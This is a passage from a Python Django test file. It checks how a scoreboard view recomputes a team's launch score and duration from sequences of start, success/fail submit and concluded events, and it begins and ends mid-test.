def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampThreeFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 4
expectedDuration_s = 8
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFourSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 9
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFourSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 9
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessSuccessFailFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailSuccessFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 7
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampSuccessFailFailFailWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 6
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessSuccessWithConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 58).replace(tzinfo=utc),
type = PiEvent.EVENT_CONCLUDED_MSG_TYPE,
team = self.team1,
pi = self.station
)
# 4th success/fail stops the attempt; time does not continue ticking
expectedScore = 8
expectedDuration_s = 7
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampFailSuccessSuccessFailNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 54).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.FAIL_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 55).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 57).replace(tzinfo=utc),
